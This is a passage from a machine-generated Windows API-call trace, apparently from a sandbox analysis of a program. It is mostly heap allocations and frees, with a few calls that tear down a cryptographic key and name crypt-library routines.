(HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0264.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.739] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0264.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55058 [0264.739] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.739] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.739] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.740] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0264.740] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0264.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51a90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0264.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.740] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0264.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.740] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.740] CryptDestroyKey (hKey=0xa87310) returned 1 [0264.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15c40 [0264.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0264.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.740] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.741] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.741] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15c40 | out: hHeap=0x970000) returned 1 [0264.742] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.742] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.742] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.742] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.743] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51988 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0264.743] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0264.743] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.743] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0264.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.743] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0264.743] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51910 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0264.744] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0264.744] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0264.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.744] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0264.745] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0264.745] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0264.745] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.745] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0264.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.745] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0264.746] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0264.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14b00 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0264.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0264.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0264.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.748] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0264.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0264.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0264.748] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", 